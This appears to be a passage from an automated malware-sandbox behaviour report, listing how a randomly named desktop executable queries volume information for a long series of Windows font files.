            Source: C:\Users\user\Desktop\z7d1ehQQQW.exe	Queries volume information: C:\Windows\Fonts\comic.ttf VolumeInformation
            Source: C:\Users\user\Desktop\z7d1ehQQQW.exe	Queries volume information: C:\Windows\Fonts\comici.ttf VolumeInformation
            Source: C:\Users\user\Desktop\z7d1ehQQQW.exe	Queries volume information: C:\Windows\Fonts\comicbd.ttf VolumeInformation
            Source: C:\Users\user\Desktop\z7d1ehQQQW.exe	Queries volume information: C:\Windows\Fonts\comicz.ttf VolumeInformation
            Source: C:\Users\user\Desktop\z7d1ehQQQW.exe	Queries volume information: C:\Windows\Fonts\consola.ttf VolumeInformation
            Source: C:\Users\user\Desktop\z7d1ehQQQW.exe	Queries volume information: C:\Windows\Fonts\consolai.ttf VolumeInformation
            Source: C:\Users\user\Desktop\z7d1ehQQQW.exe	Queries volume information: C:\Windows\Fonts\consolab.ttf VolumeInformation
            Source: C:\Users\user\Desktop\z7d1ehQQQW.exe	Queries volume information: C:\Windows\Fonts\consolaz.ttf VolumeInformation
            Source: C:\Users\user\Desktop\z7d1ehQQQW.exe	Queries volume information: C:\Windows\Fonts\constan.ttf VolumeInformation
            Source: C:\Users\user\Desktop\z7d1ehQQQW.exe	Queries volume information: C:\Windows\Fonts\constani.ttf VolumeInformation
            Source: C:\Users\user\Desktop\z7d1ehQQQW.exeQueries volume information: C:\Windows\Fonts\constanb.ttf VolumeInformation
            Source: C:\Users\user\Desktop\z7d1ehQQQW.exeQueries volume information: C:\Windows\Fonts\constanz.ttf VolumeInformation
            Source: C:\Users\user\Desktop\z7d1ehQQQW.exeQueries volume information: C:\Windows\Fonts\corbel.ttf VolumeInformation
            Source: C:\Users\user\Desktop\z7d1ehQQQW.exeQueries volume information: C:\Windows\Fonts\corbeli.ttf VolumeInformation
            Source: C:\Users\user\Desktop\z7d1ehQQQW.exeQueries volume information: C:\Windows\Fonts\corbelb.ttf VolumeInformation
            Source: C:\Users\user\Desktop\z7d1ehQQQW.exeQueries volume information: C:\Windows\Fonts\corbelz.ttf VolumeInformation
            Source: C:\Users\user\Desktop\z7d1ehQQQW.exeQueries volume information: C:\Windows\Fonts\cour.ttf VolumeInformation
            Source: C:\Users\user\Desktop\z7d1ehQQQW.exeQueries volume information: C:\Windows\Fonts\couri.ttf VolumeInformation
            Source: C:\Users\user\Desktop\z7d1ehQQQW.exeQueries volume information: C:\Windows\Fonts\courbd.ttf VolumeInformation
            Source: C:\Users\user\Desktop\z7d1ehQQQW.exeQueries volume information: C:\Windows\Fonts\courbi.ttf VolumeInformation
            Source: C:\Users\user\Desktop\z7d1ehQQQW.exeQueries volume information: C:\Windows\Fonts\ebrima.ttf VolumeInformation
            Source: C:\Users\user\Desktop\z7d1ehQQQW.exeQueries volume information: C:\Windows\Fonts\ebrimabd.ttf VolumeInformation
            Source: C:\Users\user\Desktop\z7d1ehQQQW.exeQueries volume information: C:\Windows\Fonts\framd.ttf VolumeInformation
            Source: C:\Users\user\Desktop\z7d1ehQQQW.exeQueries volume information: C:\Windows\Fonts\FRADM.TTF VolumeInformation
            Source: C:\Users\user\Desktop\z7d1ehQQQW.exeQueries volume information: C:\Windows\Fonts\framdit.ttf VolumeInformation
            Source: C:\Users\user\Desktop\z7d1ehQQQW.exeQueries volume information: C:\Windows\Fonts\FRADMIT.TTF VolumeInformation
            Source: C:\Users\user\Desktop\z7d1ehQQQW.exeQueries volume information: C:\Windows\Fonts\FRAMDCN.TTF VolumeInformation
            Source: C:\Users\user\Desktop\z7d1ehQQQW.exeQueries volume information: C:\Windows\Fonts\FRADMCN.TTF VolumeInformation
            Source: C:\Users\user\Desktop\z7d1ehQQQW.exeQueries volume information: C:\Windows\Fonts\FRAHV.TTF VolumeInformation
            Source: C:\Users\user\Desktop\z7d1ehQQQW.exeQueries volume information: C:\Windows\Fonts\FRAHVIT.TTF VolumeInformation
            Source: C:\Users\user\Desktop\z7d1ehQQQW.exeQueries volume information: C:\Windows\Fonts\Gabriola.ttf VolumeInformation
            Source: C:\Users\user\Desktop\z7d1ehQQQW.exeQueries volume information: C:\Windows\Fonts\gadugi.ttf VolumeInformation
            Source: C:\Users\user\Desktop\z7d1ehQQQW.exeQueries volume information: C:\Windows\Fonts\gadugib.ttf VolumeInformation
            Source: C:\Users\user\Desktop\z7d1ehQQQW.exeQueries volume information: C:\Windows\Fonts\georgia.ttf VolumeInformation
            Source: C:\Users\user\Desktop\z7d1ehQQQW.exeQueries volume information: C:\Windows\Fonts\georgiai.ttf VolumeInformation
            Source: C:\Users\user\Desktop\z7d1ehQQQW.exeQueries volume information: C:\Windows\Fonts\georgiab.ttf VolumeInformation
            Source: C:\Users\user\Desktop\z7d1ehQQQW.exeQueries volume information: C:\Windows\Fonts\georgiaz.ttf VolumeInformation
            Source: C:\Users\user\Desktop\z7d1ehQQQW.exeQueries volume information: C:\Windows\Fonts\impact.ttf VolumeInformation
            Source: C:\Users\user\Desktop\z7d1ehQQQW.exeQueries volume information: C:\Windows\Fonts\Inkfree.ttf VolumeInformation
            Source: C:\Users\user\Desktop\z7d1ehQQQW.exeQueries volume information: C:\Windows\Fonts\javatext.ttf VolumeInformation
            Source: C:\Users\user\Desktop\z7d1ehQQQW.exeQueries volume information: C:\Windows\Fonts\LeelawUI.ttf VolumeInformation
            Source: C:\Users\user\Desktop\z7d1ehQQQW.exeQueries volume information: C:\Windows\Fonts\LeelUIsl.ttf VolumeInformation
            Source: C:\Users\user\Desktop\z7d1ehQQQW.exeQueries volume information: C:\Windows\Fonts\LeelaUIb.ttf VolumeInformation
            Source: C:\Users\user\Desktop\z7d1ehQQQW.exeQueries volume information: C:\Windows\Fonts\lucon.ttf VolumeInformation
            Source: C:\Users\user\Desktop\z7d1ehQQQW.exeQueries volume information: C:\Windows\Fonts\l_10646.ttf VolumeInformation
            Source: C:\Users\user\Desktop\z7d1ehQQQW.exeQueries volume information: C:\Windows\Fonts\malgun.ttf VolumeInformation
            Source: C:\Users\user\Desktop\z7d1ehQQQW.exeQueries volume information: C:\Windows\Fonts\malgunsl.ttf VolumeInformation
            Source: C:\Users\user\Desktop\z7d1ehQQQW.exeQueries volume information: C:\Windows\Fonts\malgunbd.ttf VolumeInformation
            Source: C:\Users\user\Desktop\z7d1ehQQQW.exeQueries volume information: C:\Windows\Fonts\himalaya.ttf VolumeInformation
            Source: C:\Users\user\Desktop\z7d1ehQQQW.exeQueries volume information: C:\Windows\Fonts\msjh.ttc VolumeInformation
            Source: C:\Users\user\Desktop\z7d1ehQQQW.exeQueries volume information: C:\Windows\Fonts\msjhl.ttc VolumeInformation
            Source: C:\Users\user\Desktop\z7d1ehQQQW.exeQueries volume information: C:\Windows\Fonts\msjhbd.ttc VolumeInformation
            Source: C:\Users\user\Desktop\z7d1ehQQQW.exeQueries volume information: C:\Windows\Fonts\ntailu.ttf VolumeInformation
            Source: C:\Users\user\Desktop\z7d1ehQQQW.exeQueries volume information: C:\Windows\Fonts\ntailub.ttf VolumeInformation
            Source: C:\Users\user\Desktop\z7d1ehQQQW.exeQueries volume information: C:\Windows\Fonts\phagspa.ttf VolumeInformation
            Source: C:\Users\user\Desktop\z7d1ehQQQW.exeQueries volume information: C:\Windows\Fonts\phagspab.ttf VolumeInformation
            Source: C:\Users\user\Desktop\z7d1ehQQQW.exeQueries volume information: C:\Windows\Fonts\micross.ttf VolumeInformation
            Source: C:\Users\user\Desktop\z7d1ehQQQW.exeQueries volume information: C:\Windows\Fonts\taile.ttf VolumeInformation
            Source: C:\Users\user\Desktop\z7d1ehQQQW.exeQueries volume information: C:\Windows\Fonts\taileb.ttf VolumeInformation
            Source: C:\Users\user\Desktop\z7d1ehQQQW.exeQueries volume information: C:\Windows\Fonts\msyh.ttc VolumeInformation
            Source: C:\Users\user\Desktop\z7d1ehQQQW.exeQueries volume information: C:\Windows\Fonts\msyhl.ttc VolumeInformation
            Source: C:\Users\user\Desktop\z7d1ehQQQW.exeQueries volume information: C:\Windows\Fonts\msyhbd.ttc VolumeInformation
            Source: C:\Users\user\Desktop\z7d1ehQQQW.exeQueries volume information: C:\Windows\Fonts\msyi.ttf VolumeInformation
            Source: C:\Users\user\Desktop\z7d1ehQQQW.exeQueries volume information: C:\Windows\Fonts\mingliub.ttc VolumeInformation
            Source: C:\Users\user\Desktop\z7d1ehQQQW.exeQueries volume information: C:\Windows\Fonts\monbaiti.ttf VolumeInformation
            Source: C:\Users\user\Desktop\z7d1ehQQQW.exeQueries volume information: C:\Windows\Fonts\msgothic.ttc VolumeInformation
            Source: C:\Users\user\Desktop\z7d1ehQQQW.exeQueries volume information: C:\Windows\Fonts\mvboli.ttf VolumeInformation
            Source: C:\Users\user\Desktop\z7d1ehQQQW.exeQueries volume information: C:\Windows\Fonts\mmrtext.ttf VolumeInformation
            Source: C:\Users\user\Desktop\z7d1ehQQQW.exeQueries volume information: C:\Windows\Fonts\mmrtextb.ttf VolumeInformation
            Source: C:\Users\user\Desktop\z7d1ehQQQW.exeQueries volume information: C:\Windows\Fonts\Nirmala.ttf VolumeInformation
            Source: C:\Users\user\Desktop\z7d1ehQQQW.exeQueries volume information: C:\Windows\Fonts\NirmalaS.ttf VolumeInformation
            Source: C:\Users\user\Desktop\z7d1ehQQQW.exeQueries volume information: C:\Windows\Fonts\NirmalaB.ttf VolumeInformation
            Source: C:\Users\user\Desktop\z7d1ehQQQW.exeQueries volume information: C:\Windows\Fonts\pala.ttf VolumeInformation
            Source: C:\Users\user\Desktop\z7d1ehQQQW.exeQueries volume information: C:\Windows\Fonts\palai.ttf VolumeInformation
            Source: C:\Users\user\Desktop\z7d1ehQQQW.exeQueries volume information: C:\Windows\Fonts\palab.ttf VolumeInformation
            Source: C:\Users\user\Desktop\z7d1ehQQQW.exeQueries volume information: C:\Windows\Fonts\palabi.ttf VolumeInformation
            Source: C:\Users\user\Desktop\z7d1ehQQQW.exeQueries volume information: C:\Windows\Fonts\segoepr.ttf VolumeInformation
            Source: C:\Users\user\Desktop\z7d1ehQQQW.exeQueries volume information: C:\Windows\Fonts\segoeprb.ttf VolumeInformation
            Source: C:\Users\user\Desktop\z7d1ehQQQW.exeQueries volume information: C:\Windows\Fonts\segoesc.ttf VolumeInformation
            Source: C:\Users\user\Desktop\z7d1ehQQQW.exeQueries volume information: C:\Windows\Fonts\segoescb.ttf VolumeInformation
            Source: C:\Users\user\Desktop\z7d1ehQQQW.exeQueries volume information: C:\Windows\Fonts\seguiemj.ttf VolumeInformation
            Source: C:\Users\user\Desktop\z7d1ehQQQW.exeQueries volume information: C:\Windows\Fonts\seguihis.ttf VolumeInformation
            Source: C:\Users\user\Desktop\z7d1ehQQQW.exeQueries volume information: C:\Windows\Fonts\seguisym.ttf VolumeInformation
            Source: C:\Users\user\Desktop\z7d1ehQQQW.exeQueries volume information: C:\Windows\Fonts\simsun.ttc VolumeInformation
            Source: C:\Users\user\Desktop\z7d1ehQQQW.exeQueries volume information: C:\Windows\Fonts\simsunb.ttf VolumeInformation
            Source: C:\Users\user\Desktop\z7d1ehQQQW.exeQueries volume information: C:\Windows\Fonts\Sitka.ttc VolumeInformation
            Source: C:\Users\user\Desktop\z7d1ehQQQW.exeQueries volume information: C:\Windows\Fonts\SitkaI.ttc VolumeInformation
            Source: C:\Users\user\Desktop\z7d1ehQQQW.exeQueries volume information: C:\Windows\Fonts\SitkaB.ttc VolumeInformation
            Source: C:\Users\user\Desktop\z7d1ehQQQW.exeQueries volume information: C:\Windows\Fonts\SitkaZ.ttc VolumeInformation
            Source: C:\Users\user\Desktop\z7d1ehQQQW.exeQueries volume information: C:\Windows\Fonts\sylfaen.ttf VolumeInformation
            Source: C:\Users\user\Desktop\z7d1ehQQQW.exeQueries volume information: C:\Windows\Fonts\symbol.ttf VolumeInformation
            Source: C:\Users\user\Desktop\z7d1ehQQQW.exeQueries volume information: C:\Windows\Fonts\tahoma.ttf VolumeInformation
            Source: C:\Users\user\Desktop\z7d1ehQQQW.exeQueries volume information: C:\Windows\Fonts\tahomabd.ttf VolumeInformation
            Source: C:\Users\user\Desktop\z7d1ehQQQW.exeQueries volume information: C:\Windows\Fonts\trebuc.ttf VolumeInformation
            Source: C:\Users\user\Desktop\z7d1ehQQQW.exeQueries volume information: C:\Windows\Fonts\trebucit.ttf VolumeInformation
            Source: C:\Users\user\Desktop\z7d1ehQQQW.exeQueries volume information: C:\Windows\Fonts\trebucbd.ttf VolumeInformation
            Source: C:\Users\user\Desktop\z7d1ehQQQW.exeQueries volume information: C:\Windows\Fonts\trebucbi.ttf VolumeInformation
            Source: C:\Users\user\Desktop\z7d1ehQQQW.exeQueries volume information: C:\Windows\Fonts\verdana.ttf VolumeInformation
            Source: C:\Users\user\Desktop\z7d1ehQQQW.exeQueries volume information: C:\Windows\Fonts\verdanai.ttf VolumeInformation
            Source: C:\Users\user\Desktop\z7d1ehQQQW.exeQueries volume information: C:\Windows\Fonts\verdanab.ttf VolumeInformation
            Source: C:\Users\user\Desktop\z7d1ehQQQW.exeQueries volume information: C:\Windows\Fonts\verdanaz.ttf VolumeInformation
            Source: C:\Users\user\Desktop\z7d1ehQQQW.exeQueries volume information: C:\Windows\Fonts\webdings.ttf VolumeInformation
            Source: C:\Users\user\Desktop\z7d1ehQQQW.exeQueries volume information: C:\Windows\Fonts\wingding.ttf VolumeInformation
            Source: C:\Users\user\Desktop\z7d1ehQQQW.exeQueries volume information: C:\Windows\Fonts\YuGothR.ttc VolumeInformation
            Source: C:\Users\user\Desktop\z7d1ehQQQW.exeQueries volume information: C:\Windows\Fonts\YuGothM.ttc VolumeInformation
            Source: C:\Users\user\Desktop\z7d1ehQQQW.exeQueries volume information: C:\Windows\Fonts\YuGothL.ttc VolumeInformation
            Source: C:\Users\user\Desktop\z7d1ehQQQW.exeQueries volume information: C:\Windows\Fonts\YuGothB.ttc VolumeInformation
            Source: C:\Users\user\Desktop\z7d1ehQQQW.exeQueries volume information: C:\Windows\Fonts\holomdl2.ttf VolumeInformation
            Source: C:\Users\user\Desktop\z7d1ehQQQW.exeQueries volume information: C:\Windows\Fonts\CENTURY.TTF VolumeInformation
            Source: C:\Users\user\Desktop\z7d1ehQQQW.exeQueries volume information: C:\Windows\Fonts\LEELAWAD.TTF VolumeInformation
            Source: C:\Users\user\Desktop\z7d1ehQQQW.exeQueries volume information: C:\Windows\Fonts\LEELAWDB.TTF VolumeInformation
            Source: C:\Users\user\Desktop\z7d1ehQQQW.exeQueries volume information: C:\Windows\Fonts\MSUIGHUR.TTF VolumeInformation
            Source: C:\Users\user\Desktop\z7d1ehQQQW.exeQueries volume information: C:\Windows\Fonts\MSUIGHUB.TTF VolumeInformation
            Source: C:\Users\user\Desktop\z7d1ehQQQW.exeQueries volume information: C:\Windows\Fonts\WINGDNG2.TTF VolumeInformation
            Source: C:\Users\user\Desktop\z7d1ehQQQW.exeQueries volume information: C:\Windows\Fonts\WINGDNG3.TTF VolumeInformation
            Source: C:\Users\user\Desktop\z7d1ehQQQW.exeQueries volume information: C:\Windows\Fonts\TEMPSITC.TTF VolumeInformation
            Source: C:\Users\user\Desktop\z7d1ehQQQW.exeQueries volume information: C:\Windows\Fonts\PRISTINA.TTF VolumeInformation
            Source: C:\Users\user\Desktop\z7d1ehQQQW.exeQueries volume information: C:\Windows\Fonts\PAPYRUS.TTF VolumeInformation
            Source: C:\Users\user\Desktop\z7d1ehQQQW.exeQueries volume information: C:\Windows\Fonts\MISTRAL.TTF VolumeInformation
            Source: C:\Users\user\Desktop\z7d1ehQQQW.exeQueries volume information: C:\Windows\Fonts\LHANDW.TTF VolumeInformation
            Source: C:\Users\user\Desktop\z7d1ehQQQW.exeQueries volume information: C:\Windows\Fonts\ITCKRIST.TTF VolumeInformation
            Source: C:\Users\user\Desktop\z7d1ehQQQW.exeQueries volume information: C:\Windows\Fonts\JUICE___.TTF VolumeInformation
            Source: C:\Users\user\Desktop\z7d1ehQQQW.exeQueries volume information: C:\Windows\Fonts\FRSCRIPT.TTF VolumeInformation
            Source: C:\Users\user\Desktop\z7d1ehQQQW.exeQueries volume information: C:\Windows\Fonts\FREESCPT.TTF VolumeInformation
            Source: C:\Users\user\Desktop\z7d1ehQQQW.exeQueries volume information: C:\Windows\Fonts\BRADHITC.TTF VolumeInformation
            Source: C:\Users\user\Desktop\z7d1ehQQQW.exeQueries volume information: C:\Windows\Fonts\OUTLOOK.TTF VolumeInformation
            Source: C:\Users\user\Desktop\z7d1ehQQQW.exeQueries volume information: C:\Windows\Fonts\BKANT.TTF VolumeInformation
            Source: C:\Users\user\Desktop\z7d1ehQQQW.exeQueries volume information: C:\Windows\Fonts\ANTQUAI.TTF VolumeInformation
            Source: C:\Users\user\Desktop\z7d1ehQQQW.exeQueries volume information: C:\Windows\Fonts\ANTQUAB.TTF VolumeInformation
            Source: C:\Users\user\Desktop\z7d1ehQQQW.exeQueries volume information: C:\Windows\Fonts\ANTQUABI.TTF VolumeInformation
            Source: C:\Users\user\Desktop\z7d1ehQQQW.exeQueries volume information: C:\Windows\Fonts\GARA.TTF VolumeInformation
            Source: C:\Users\user\Desktop\z7d1ehQQQW.exeQueries volume information: C:\Windows\Fonts\GARAIT.TTF VolumeInformation
            Source: C:\Users\user\Desktop\z7d1ehQQQW.exeQueries volume information: C:\Windows\Fonts\GARABD.TTF VolumeInformation
            Source: C:\Users\user\Desktop\z7d1ehQQQW.exeQueries volume information: C:\Windows\Fonts\MTCORSVA.TTF VolumeInformation
            Source: C:\Users\user\Desktop\z7d1ehQQQW.exeQueries volume information: C:\Windows\Fonts\GOTHIC.TTF VolumeInformation
            Source: C:\Users\user\Desktop\z7d1ehQQQW.exeQueries volume information: C:\Windows\Fonts\GOTHICI.TTF VolumeInformation
            Source: C:\Users\user\Desktop\z7d1ehQQQW.exeQueries volume information: C:\Windows\Fonts\GOTHICB.TTF VolumeInformation
            Source: C:\Users\user\Desktop\z7d1ehQQQW.exeQueries volume information: C:\Windows\Fonts\GOTHICBI.TTF VolumeInformation
            Source: C:\Users\user\Desktop\z7d1ehQQQW.exeQueries volume information: C:\Windows\Fonts\ALGER.TTF VolumeInformation
            Source: C:\Users\user\Desktop\z7d1ehQQQW.exeQueries volume information: C:\Windows\Fonts\BASKVILL.TTF VolumeInformation
            Source: C:\Users\user\Desktop\z7d1ehQQQW.exeQueries volume information: C:\Windows\Fonts\BAUHS93.TTF VolumeInformation
            Source: C:\Users\user\Desktop\z7d1ehQQQW.exeQueries volume information: C:\Windows\Fonts\BELL.TTF VolumeInformation
            Source: C:\Users\user\Desktop\z7d1ehQQQW.exeQueries volume information: C:\Windows\Fonts\BELLI.TTF VolumeInformation
            Source: C:\Users\user\Desktop\z7d1ehQQQW.exeQueries volume information: C:\Windows\Fonts\BELLB.TTF VolumeInformation
            Source: C:\Users\user\Desktop\z7d1ehQQQW.exeQueries volume information: C:\Windows\Fonts\BRLNSR.TTF VolumeInformation
            Source: C:\Users\user\Desktop\z7d1ehQQQW.exeQueries volume information: C:\Windows\Fonts\BRLNSDB.TTF VolumeInformation
            Source: C:\Users\user\Desktop\z7d1ehQQQW.exeQueries volume information: C:\Windows\Fonts\BRLNSB.TTF VolumeInformation
            Source: C:\Users\user\Desktop\z7d1ehQQQW.exeQueries volume information: C:\Windows\Fonts\BERNHC.TTF VolumeInformation
            Source: C:\Users\user\Desktop\z7d1ehQQQW.exeQueries volume information: C:\Windows\Fonts\BOD_PSTC.TTF VolumeInformation
            Source: C:\Users\user\Desktop\z7d1ehQQQW.exeQueries volume information: C:\Windows\Fonts\BRITANIC.TTF VolumeInformation
            Source: C:\Users\user\Desktop\z7d1ehQQQW.exeQueries volume information: C:\Windows\Fonts\BROADW.TTF VolumeInformation
            Source: C:\Users\user\Desktop\z7d1ehQQQW.exeQueries volume information: C:\Windows\Fonts\BRUSHSCI.TTF VolumeInformation
            Source: C:\Users\user\Desktop\z7d1ehQQQW.exeQueries volume information: C:\Windows\Fonts\CALIFR.TTF VolumeInformation
            Source: C:\Users\user\Desktop\z7d1ehQQQW.exeQueries volume information: C:\Windows\Fonts\CALIFI.TTF VolumeInformation
            Source: C:\Users\user\Desktop\z7d1ehQQQW.exeQueries volume information: C:\Windows\Fonts\CALIFB.TTF VolumeInformation
            Source: C:\Users\user\Desktop\z7d1ehQQQW.exeQueries volume information: C:\Windows\Fonts\CENTAUR.TTF VolumeInformation
            Source: C:\Users\user\Desktop\z7d1ehQQQW.exeQueries volume information: C:\Windows\Fonts\CHILLER.TTF VolumeInformation
            Source: C:\Users\user\Desktop\z7d1ehQQQW.exeQueries volume information: C:\Windows\Fonts\COLONNA.TTF VolumeInformation
            Source: C:\Users\user\Desktop\z7d1ehQQQW.exeQueries volume information: C:\Windows\Fonts\COOPBL.TTF VolumeInformation
            Source: C:\Users\user\Desktop\z7d1ehQQQW.exeQueries volume information: C:\Windows\Fonts\FTLTLT.TTF VolumeInformation
            Source: C:\Users\user\Desktop\z7d1ehQQQW.exeQueries volume information: C:\Windows\Fonts\HARLOWSI.TTF VolumeInformation
            Source: C:\Users\user\Desktop\z7d1ehQQQW.exeQueries volume information: C:\Windows\Fonts\HARNGTON.TTF VolumeInformation
            Source: C:\Users\user\Desktop\z7d1ehQQQW.exeQueries volume information: C:\Windows\Fonts\HTOWERT.TTF VolumeInformation
            Source: C:\Users\user\Desktop\z7d1ehQQQW.exeQueries volume information: C:\Windows\Fonts\HTOWERTI.TTF VolumeInformation
            Source: C:\Users\user\Desktop\z7d1ehQQQW.exeQueries volume information: C:\Windows\Fonts\JOKERMAN.TTF VolumeInformation
            Source: C:\Users\user\Desktop\z7d1ehQQQW.exeQueries volume information: C:\Windows\Fonts\KUNSTLER.TTF VolumeInformation
            Source: C:\Users\user\Desktop\z7d1ehQQQW.exeQueries volume information: C:\Windows\Fonts\LBRITE.TTF VolumeInformation
            Source: C:\Users\user\Desktop\z7d1ehQQQW.exeQueries volume information: C:\Windows\Fonts\LBRITED.TTF VolumeInformation
            Source: C:\Users\user\Desktop\z7d1ehQQQW.exeQueries volume information: C:\Windows\Fonts\LBRITEI.TTF VolumeInformation
            Source: C:\Users\user\Desktop\z7d1ehQQQW.exeQueries volume information: C:\Windows\Fonts\LBRITEDI.TTF VolumeInformation
            Source: C:\Users\user\Desktop\z7d1ehQQQW.exeQueries volume information: C:\Windows\Fonts\LCALLIG.TTF VolumeInformation
            Source: C:\Users\user\Desktop\z7d1ehQQQW.exeQueries volume information: C:\Windows\Fonts\LFAX.TTF VolumeInformation
            Source: C:\Users\user\Desktop\z7d1ehQQQW.exeQueries volume information: C:\Windows\Fonts\LFAXD.TTF VolumeInformation
            Source: C:\Users\user\Desktop\z7d1ehQQQW.exeQueries volume information: C:\Windows\Fonts\LFAXI.TTF VolumeInformation
            Source: C:\Users\user\Desktop\z7d1ehQQQW.exeQueries volume information: C:\Windows\Fonts\LFAXDI.TTF VolumeInformation
            Source: C:\Users\user\Desktop\z7d1ehQQQW.exeQueries volume information: C:\Windows\Fonts\MAGNETOB.TTF VolumeInformation
            Source: C:\Users\user\Desktop\z7d1ehQQQW.exeQueries volume information: C:\Windows\Fonts\MATURASC.TTF VolumeInformation
            Source: C:\Users\user\Desktop\z7d1ehQQQW.exeQueries volume information: C:\Windows\Fonts\MOD20.TTF VolumeInformation
            Source: C:\Users\user\Desktop\z7d1ehQQQW.exeQueries volume information: C:\Windows\Fonts\NIAGENG.TTF VolumeInformation
            Source: C:\Users\user\Desktop\z7d1ehQQQW.exeQueries volume information: C:\Windows\Fonts\NIAGSOL.TTF VolumeInformation
            Source: C:\Users\user\Desktop\z7d1ehQQQW.exeQueries volume information: C:\Windows\Fonts\OLDENGL.TTF VolumeInformation
            Source: C:\Users\user\Desktop\z7d1ehQQQW.exeQueries volume information: C:\Windows\Fonts\ONYX.TTF VolumeInformation
            Source: C:\Users\user\Desktop\z7d1ehQQQW.exeQueries volume information: C:\Windows\Fonts\PARCHM.TTF VolumeInformation
            Source: C:\Users\user\Desktop\z7d1ehQQQW.exeQueries volume information: C:\Windows\Fonts\PLAYBILL.TTF VolumeInformation
            Source: C:\Users\user\Desktop\z7d1ehQQQW.exeQueries volume information: C:\Windows\Fonts\POORICH.TTF VolumeInformation
            Source: C:\Users\user\Desktop\z7d1ehQQQW.exeQueries volume information: C:\Windows\Fonts\RAVIE.TTF VolumeInformation
            Source: C:\Users\user\Desktop\z7d1ehQQQW.exeQueries volume information: C:\Windows\Fonts\INFROMAN.TTF VolumeInformation
            Source: C:\Users\user\Desktop\z7d1ehQQQW.exeQueries volume information: C:\Windows\Fonts\SHOWG.TTF VolumeInformation
            Source: C:\Users\user\Desktop\z7d1ehQQQW.exeQueries volume information: C:\Windows\Fonts\SNAP____.TTF VolumeInformation
            Source: C:\Users\user\Desktop\z7d1ehQQQW.exeQueries volume information: C:\Windows\Fonts\STENCIL.TTF VolumeInformation
            Source: C:\Users\user\Desktop\z7d1ehQQQW.exeQueries volume information: C:\Windows\Fonts\VINERITC.TTF VolumeInformation
            Source: C:\Users\user\Desktop\z7d1ehQQQW.exeQueries volume information: C:\Windows\Fonts\VIVALDII.TTF VolumeInformation
            Source: C:\Users\user\Desktop\z7d1ehQQQW.exeQueries volume information: C:\Windows\Fonts\VLADIMIR.TTF VolumeInformation
            Source: C:\Users\user\Desktop\z7d1ehQQQW.exeQueries volume information: C:\Windows\Fonts\LATINWD.TTF VolumeInformation
            Source: C:\Users\user\Desktop\z7d1ehQQQW.exeQueries volume information: C:\Windows\Fonts\TCM_____.TTF VolumeInformation
            Source: C:\Users\user\Desktop\z7d1ehQQQW.exeQueries volume information: C:\Windows\Fonts\TCMI____.TTF VolumeInformation
            Source: C:\Users\user\Desktop\z7d1ehQQQW.exeQueries volume information: C:\Windows\Fonts\TCB_____.TTF VolumeInformation
            Source: C:\Users\user\Desktop\z7d1ehQQQW.exeQueries volume information: C:\Windows\Fonts\TCBI____.TTF VolumeInformation
            Source: C:\Users\user\Desktop\z7d1ehQQQW.exeQueries volume information: C:\Windows\Fonts\TCCM____.TTF VolumeInformation
            Source: C:\Users\user\Desktop\z7d1ehQQQW.exeQueries volume information: C:\Windows\Fonts\TCCB____.TTF VolumeInformation
            Source: C:\Users\user\Desktop\z7d1ehQQQW.exeQueries volume information: C:\Windows\Fonts\TCCEB.TTF VolumeInformation
            Source: C:\Users\user\Desktop\z7d1ehQQQW.exeQueries volume information: C:\Windows\Fonts\SCRIPTBL.TTF VolumeInformation
            Source: C:\Users\user\Desktop\z7d1ehQQQW.exeQueries volume information: C:\Windows\Fonts\ROCK.TTF VolumeInformation
            Source: C:\Users\user\Desktop\z7d1ehQQQW.exeQueries volume information: C:\Windows\Fonts\ROCKI.TTF VolumeInformation
            Source: C:\Users\user\Desktop\z7d1ehQQQW.exeQueries volume information: C:\Windows\Fonts\ROCKB.TTF VolumeInformation
            Source: C:\Users\user\Desktop\z7d1ehQQQW.exeQueries volume information: C:\Windows\Fonts\ROCKEB.TTF VolumeInformation
            Source: C:\Users\user\Desktop\z7d1ehQQQW.exeQueries volume information: C:\Windows\Fonts\ROCKBI.TTF VolumeInformation
            Source: C:\Users\user\Desktop\z7d1ehQQQW.exeQueries volume information: C:\Windows\Fonts\ROCC____.TTF VolumeInformation
            Source: C:\Users\user\Desktop\z7d1ehQQQW.exeQueries volume information: C:\Windows\Fonts\ROCCB___.TTF VolumeInformation
            Source: C:\Users\user\Desktop\z7d1ehQQQW.exeQueries volume information: C:\Windows\Fonts\RAGE.TTF VolumeInformation
            Source: C:\Users\user\Desktop\z7d1ehQQQW.exeQueries volume information: C:\Windows\Fonts\PERTILI.TTF VolumeInformation
            Source: C:\Users\user\Desktop\z7d1ehQQQW.exeQueries volume information: C:\Windows\Fonts\PERTIBD.TTF VolumeInformation
            Source: C:\Users\user\Desktop\z7d1ehQQQW.exeQueries volume information: C:\Windows\Fonts\PER_____.TTF VolumeInformation
            Source: C:\Users\user\Desktop\z7d1ehQQQW.exeQueries volume information: C:\Windows\Fonts\PERI____.TTF VolumeInformation
            Source: C:\Users\user\Desktop\z7d1ehQQQW.exeQueries volume information: C:\Windows\Fonts\PERB____.TTF VolumeInformation
            Source: C:\Users\user\Desktop\z7d1ehQQQW.exeQueries volume information: C:\Windows\Fonts\PERBI___.TTF VolumeInformation
            Source: C:\Users\user\Desktop\z7d1ehQQQW.exeQueries volume information: C:\Windows\Fonts\PALSCRI.TTF VolumeInformation
            Source: C:\Users\user\Desktop\z7d1ehQQQW.exeQueries volume information: C:\Windows\Fonts\OCRAEXT.TTF VolumeInformation
            Source: C:\Users\user\Desktop\z7d1ehQQQW.exeQueries volume information: C:\Windows\Fonts\MAIAN.TTF VolumeInformation
            Source: C:\Users\user\Desktop\z7d1ehQQQW.exeQueries volume information: C:\Windows\Fonts\LTYPE.TTF VolumeInformation
            Source: C:\Users\user\Desktop\z7d1ehQQQW.exeQueries volume information: C:\Windows\Fonts\LTYPEO.TTF VolumeInformation
            Source: C:\Users\user\Desktop\z7d1ehQQQW.exeQueries volume information: C:\Windows\Fonts\LTYPEB.TTF VolumeInformation
            Source: C:\Users\user\Desktop\z7d1ehQQQW.exeQueries volume information: C:\Windows\Fonts\LTYPEBO.TTF VolumeInformation
            Source: C:\Users\user\Desktop\z7d1ehQQQW.exe | Queries volume information: C:\Windows\Fonts\LSANS.TTF VolumeInformation
            Source: C:\Users\user\Desktop\z7d1ehQQQW.exe | Queries volume information: C:\Windows\Fonts\LSANSD.TTF VolumeInformation
            Source: C:\Users\user\Desktop\z7d1ehQQQW.exe | Queries volume information: C:\Windows\Fonts\LSANSI.TTF VolumeInformation
            Source: C:\Users\user\Desktop\z7d1ehQQQW.exe | Queries volume information: C:\Windows\Fonts\LSANSDI.TTF VolumeInformation
